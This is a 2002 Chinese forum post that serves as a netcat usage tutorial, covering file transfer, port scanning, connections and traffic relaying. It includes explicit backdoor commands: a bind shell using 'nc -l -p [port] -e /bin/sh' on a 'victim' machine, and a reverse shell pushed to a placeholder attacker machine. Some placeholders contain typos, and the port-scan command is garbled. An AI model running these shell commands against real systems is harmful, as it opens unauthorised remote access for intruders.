任我游 
  
级别:老 站 友
威望:0
经验:0
货币:1356
体力:
来源:china
总发帖数:264
注册日期:2002-07-27
|
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
netcat的原理简单得有点让人不相信:它只是让用户通过网络传递数据,功能上很像UNIX的cat命令。然而,cat命令只是在本地系统上对数据进行转移,而netcat则是通过TCP或UDP的端口转移任意数据。它更像一个一般性的网络工具,可用来从任意一个TCP或UDP端口到另外的任意一个TCP或UDP端口传输和接收数据。还支持源路由,可以用来进行源路由欺骗攻击。下面是netcat的用法:
一:netcat用于文件传输
接受文件的目标机器:$nc -l -p 1234 > [fele]
发送文件的源机器: $nc [remote-machine] 1234 < [file]
另外netcat还可用来拉文件,实现命令是:
源机器,提供文件以进行传输:$nc -l -p 1234 <
[file]
目标机器,拉文件: $nc -l -p 1234 > [file]
二 netcat用于端口扫描:
$ echo QUIT nc -v -w [target machine] [startport]-[eneport]
三 netcat用于建立到开放端口连接
$ nc -u [target-machine] [port]
四
netcat用于创建被动的后门命令shell
目标机器: $ nc -l -p [port] -e /bin/sh
攻击者的机器: $ nc [victim-macine] [port}
注意:目标机器是NT 的话把 -e
后面改成cmd.exe 就行了
五 netcat主动地推动一个后门命令shell
攻击者的机器:$ nc -l -p
[port]
目标机器:$ nc [attckers-machine] [port] -e /bin/sh
六
netcat用于进行流量中继
有两种方法:就用UNIXL来举例吧。
第一种是使用inetd和netcat创建一个中继,所以应该在/etc/inetd.conf中加上一行,以让inted在某一端口进行监听,并以客户形式运行netcat以发送流量。下面/etc/inetd.conf中的这一行将使inted在TCP端口11111上监听,并运行netcat客户,netcat客户会将流量发往以net-hope为名的机器的TCP端口54321
:1111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc
[net-hop] 54321
哇,打字好慢,手也有点不舒服了。还是先写到这里吧!也不知道有没有人看~~哈哈 |
首页 
小榕软件实验室 
刀光雪影 
NETCAT:多功能网络工具! 
将此页发给您的朋友
编辑
删除
发表于
2002-08-16.19:50:51 
IP: 
